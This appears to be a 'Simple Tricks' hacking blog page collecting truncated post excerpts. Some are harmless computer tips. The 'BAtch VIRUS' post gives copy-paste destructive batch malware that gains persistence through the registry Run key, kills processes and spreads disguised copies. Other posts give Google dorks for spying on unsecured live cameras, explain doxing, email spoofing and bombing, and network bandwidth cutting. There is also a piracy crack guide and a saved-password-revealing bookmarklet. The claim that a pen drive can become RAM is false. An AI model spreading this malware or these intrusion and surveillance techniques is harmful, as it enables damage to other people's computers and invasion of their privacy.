SIMPLE TRICKS

DELETING files beyond recovery................


FREERASER There are many free digital file shredders out there but here i bring you the easiest, smallest & fastest................... An ordinary deleting of files isn't enough! When you wish to delete any sensitive information, like industrial secrets , transaction details and hacking tracks, you want to be sure that it will be deleted permanently. Sorry to say, there are plenty recovery tools that can restore your deleted items. If you need to destroy any data and eliminate any possibility of its restoration you need a "shredder". This software destroys the data you choose before the deletion, using a complicated procedure of filling the actual content with random data. Freeraser can function on three levels: a fast...

What Is A CAPTCHA, And How Does It Work?


  CAPTCHA or Captcha (pronounced ch-Cap-uh), meaning "completely automated public Turing test to tell computers and people outside" is a form of provocation test / answer to ensure that the response is generated only by those and not a computer. In simple terms, the CAPTCHA word verification you will encounter at the end of a registration form when you signed up for Gmail or Yahoo. The following image shows typical examples of CAPTCHA. Almost all Internet users will experience in their daily use CAPTCHA, but few are aware of what it is and why they are used. So in this post, you will find detailed information on how the CAPTCHA works and why they are used. What is the exact purpose CAPTCHA Served? CAPTCPA is mainly used to...

How To Set Up Multiple Users On A PC


Setting up separate accounts on a shared PC would help to retain documents as images and organized labor, and it will be much easier to follow both the duties of tomorrow and the budget proposal next week . Step By Step 1. Click the Windows orb to open the Start menu, then click Control Panel. 2. If you are using Classic View, click the icon called User Accounts. " Usually accompanied by an icon of two cartoons. If you use the new control panel is standard on Vista and Windows 7, click on Add or remove user accounts ", the text in the User Accounts and Family Safety" section. This takes you to Manage Accounts screen, allowing you to change your user accounts after adding 3. Click "Create a new account" in the large text box that...

BAtch VIRUS


This one is a simple batch virus Just copy and paste the code given below in notepad and save it as anyname.bat(not txt) Be carefull & Don't run this on ur pc @Echo off color 4 title 4 title R.I.P start start start start calc copy %0 %Systemroot%\Greatgame > nul reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ /d %systemroot%\Greatgame.bat /f > nul copy %0 *.bat > nul Attrib +r +h Greatgame.bat Attrib +r +h RUNDLL32 USER32.DLL.SwapMouseButton start calc cls tskill msnmsgr tskill LimeWire tskill iexplore tskill NMain start cls cd %userprofile%\desktop copy Greatgame.bat R.I.P.bat copy Greatgame.bat R.I.P.jpg copy Greatgame.bat R.I.P.txt copy Greatgame.bat R.I.P.exe copy Greatgame.bat R.I.P.mov copy Greatgame.bat FixVirus.bat cd %userprofile%My...

How to Hack into a Live Security Camera


Well this is an interesting article. It is a sub-section of a Hacking Technique known as “Google Hacking”. All what we are looking at are unsecured cams from around the world that are interfaced with the internet. So how do you find such cameras. Just search these following strings in Google and select any result. Whoa, you can see a live cam on your PC screen!! The strings are given below: inurl:”CgiStart?page=” inurl:/view.shtml intitle:”Live View / – AXIS inurl:view/view.shtml inurl:ViewerFrame?Mode= inurl:ViewerFrame?Mode=Refresh inurl:axis-cgi/jpg inurl:axis-cgi/mjpg (motion-JPEG) (disconnected) inurl:view/indexFrame.shtml inurl:view/index.shtml inurl:view/view.shtml liveapplet intitle:”live view” intitle:axis intitle:liveapplet allintitle:”Network...

You wanna know who used your PC in your absence


Who Used Your Pc In Your Absence,what Did He Do? first you should go "start > run >eventvwr.msc" Events are stored in three log files: Application, Security, and System. These logs can be reviewed and archived. For our purposes we want the System log. Click on "System" in the left-hand column for a list of events. Look for a date and time when you weren't home and your computer should have been off. double click on the eg: info n it will show u the detail. You can also use this log to see how long someone was on the computer. Just look at the time the computer was turned on and off for that day. Hope u all will like ...

Trick To Watch Stars Wars Movie In DOS


Sometime back someone decided to create  ‘Star Wars Episode IV: A New Hope’ in command line interface so that you can watch it on DOS .There is no sound associated with this movie but the dialogues are written alongside the screen.It is real fun to watch starwars movie in DOS.This trick requires that you should have internet connection.As this trick is in command line interface so it doesn’t need high speed internet connection and  even dialup connections will work smoothly. This tricks works on windows xp,vista,windows 7, UNIX, Linux, Mac, Solaris, Beos or any other system that uses telnet client.I will explain this trick only for xp,vista and windows 7.Linux geeks...

Funny Trick To Hack Facebook


If you really want to impress someone with your hacking skills then this trick will surely help you.Well this is actually not any hacking just a simple javacript trick but the other person will surely believe you as a hacker. So what can you do with this trick? You can edit content of any website including facebook,myspace,twitter etc.For instance see the pic below How to perform this trick? Open any website of your choice (like facebook) in  browser (internet explorer,google chrome,firefox) and clear the address bar of the browser. Copy paste the following javascript code in the address bar of your browser javascript:document.body.contentEditable='true'; document.designMode='on'; void 0; And thats it.Now you can edit anything that...

Use Pen drive As RAM !!


Here is the required procedure for converting USB/pendrive memory into RAM manually… 1) Plug your pendrive into PC/laptop. 2) Right Click On My Computer. 3) Open up properties. 4) Go to Advanced Option. 5) Now select Settings of Performance. 6) Again Click on the Advanced Button which is shown In the popup Window. 7) Now click on Change button shown in Virtual memory. 8) Now select the available memory of your removable USB/Pendrive. 9) Set the value and apply the changes. ... yes it is possible all the memory available in a removable pendrive/USB can be converted into RAM to increase the working speed of the computer. Manual Method to Convert USB/Pendrive Into RAM ... 10) Restart your PC/Laptop and Thus you are do...

What are Torrents and its working ?


Torrents have become very popular way to download everything for free of cost like Movies, Games, Software, Music, Scripts etc. Torrents are everywhere on the internet with some advantages and disadvantages, here we will briefly try to explain what actually torrents are and how they work. Torrent actually itself is a small file having *.torrent extension, that you can say it contains a link to the file to be downloaded. But here in this case, files to be downloaded are not hosted on web servers instead these files are downloaded from other computers (just like yours) connected with internet. In simpler words, if you have downloading a file from torrent, same you are providing to download for other downloader and similarly you can download files...

Find Serial Key / Cracks for Any Software !


This time i am going to explain you that how you can "Find Serial Key / Cracks for Any Software !".I assume that most of you use pirated software. Not everyone can afford buying a program like Photoshop, which costs $699. In this case you can use alternative, free software or you can download a pirated, cracked version of the program. There is a vast number of websites out there, where you can find serial numbers and cracks for any program, but most of them aren't safe to use. Actually most of them are spam sites that “bombard” you with full-screen popup ads, or commandeer your computer into a spam-loving Kraken  or Srizbi Botnet army. In this post I will show you the most efficient way of downloading cracks and serial numbers without...

Windows Mystery Exposed : Can you make a folder named ‘CON’ ?


Hello, I am back with a most funny and mysterious artice.. Hope all of you will enjoy to know all this... One day my Sir told me that he got a mail the message written on that is almost as below... Nobody can create a FOLDER anywhere on the computer which can be named as “CON”.This is something pretty cool…and unbelievable… At Microsoft the whole Team, including Bill Gates, couldn’t answer why this happened!TRY IT NOW !! This is not the first time I listen about this funny question that "why we can't create a folder with name 'CON' " ?, and I’m sure most of ICA member also try to make folder "CON" just now after reading the title of article  ! if no,then go and 1st try it .... If you try creating a folder named CON, as the mail...

Doxing - A Way of Tracing Anonymous People


Doxing is a way of tracing someone or getting information about an individual using sources on the internet and social engineering techniques. It's term was derived from --Documents-- as a matter of fact its the retrieval of Documents on a person or an organization. I saw a well detailed information on how to implement this techniques and i will be sharing it here. As presented by Chintan Gurjar below is a technique to trace an anonymous person. What is Doxing ? Doxing(“Documents” or “Docx”) is the part of technique “Tracing”. It plays an important role in tracing. To gathering all available information is called as doxing. In information there are many informations like documents,victim’s name, gender and also that on internet on which...

Send , identify , trace Fake/Spoofed Email | Email Bombing | Email Spamming


Basics of working of Email ( You can skip this part) Email stands for Electronic Mail. Email sending and receiving is controlled by the Email servers.Email service providers configure Email Server before anyone can Sign into his or her account and start communicating digitally.Users from across the world register in to these Email servers and setup an Email account. Email Travelling Path :- Let’s say we have two Email providers, one is gmail.com and other is yahoo.com, ABC is a registered user in gmail.com and XYZ is a registered user in yahoo.com. • ABC signs in to his Email account in gmail.com, he then writes a mail to the xyz@yahoo.com and sends the message. • But what happens behind the curtains, the Email from...

Increase uTorrent Download Speed By 80%


Note this trick will work if ur  ISP SPEED IS MORE  Disable your firewall before using this trick Now follow below pictorial TUT - - - - - - -  This method is 100% working Tested by me say thanks to darkmascot...

How to get googlemail.com domain


Each and every Gmail account has two email addresses, one is commonly known regular @gmail.com while another email address that can also be used to receive mail message is ending with @googlemail.com domain. Both email addresses also support multiple email aliases by adding plus symbol (for label) and dots (any number of them) to Gmail user name. Google Mail is a workaround solution by Gmail to provide its service in United Kingdom (UK) and Germany where there is trademark dispute on rights to own the name of Gmail. Both domains basically points to the same mailbox of the user name. For example, for an Gmail account with default e-mail address of billgates@gmail.com, all email messages sent to billgates@googlemail.com will also be delivered to the same inbox, and vice versa. While people...

Use Pen drive As RAM - Speed Up Computer


Today I,ll show you a nice trick to boost the working speed of your computer as now a days there are large number of programs and softwares which require a large amount of memory to be run properly. And often you don’t have that required memory installed as RAM. I,ll talk about this trick generally so that it may be applicable to every windows. First I,ll show you a manual way and after that I,ll provide you a software for this purpose. The basic scheme is this that we are going to use a pendrive or USB drive as a RAM, yes it is possible all the memory available in a removable pendrive/USB can be converted into RAM to increase the working speed of the computer. Manual Method to Convert USB/Pendrive Into RAM:-Here is the required procedure for converting USB/pendrive memory into RAM manually… 1)...

Bandwidth Stealer For Fast Browsing


If you are in your school's computer lab or in home , this software will always help you in your work . It is common thing to have many computer's connected with one device for internet and it causes your bandwidth to fall down . Here I am introducing a software called netcut which cuts the one's connection in such a crucial condition as I stated, I am stating it as crucial as really it’s a headache causing problem for me I hate slow surfing.When it cuts the one's connection , it automatically increases bandwidth of your connection which will let you work more easily and fastly. Download Netcut here for Free:-You can download this bandwidth stealing software named as Netcut from below:- Download Netcut Using Netcut :- 1: Download...

Facebook keyboard Shortcuts !


Facebook has Keyboard Shortcuts to make your navigation easier. It is an automatic feature which is already enabled. You can now use shortcuts to quickly jump from facebook home page to any page. This is very useful for smooth and fast facebook user who ever not very much want to use mouse/track-pad while on facebook chat or navigation through pages. So these are shortcuts which will really help you for sure. List of FacebooK Keyboard Shortcuts Alt + 1 Return to FB Homepage Alt + 2 To goto Wall Tab of your Profile Page Alt + 3 To view Friends Requests list Drop down List Alt + 4 To view latest Messages list in Drop down List Alt + 5 To view Notification list Drop down List Alt + 6 To goto Account setting Webpage Alt + 7 To goto Account privacy configuration Webpage Alt + 8 To open Facebook...

How To Reveal Hidden Passwords and Unmask Asterisks Without Using Any Software !!


Well, as the title says, today we will show a very simple way to unveil hidden and saved passwords in any internet browser. Rather than wasting time and money on various programs, there is actually an extremely easy and straightforward way to reveal passwords under the asterisks. All you have to do is to copy and past the following code into the address line of your browser and press enter. You can also save it as a Bookmark or Favorite, and then whenever you want to run the script, just click on the bookmark. javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords...

No comments:

Post a Comment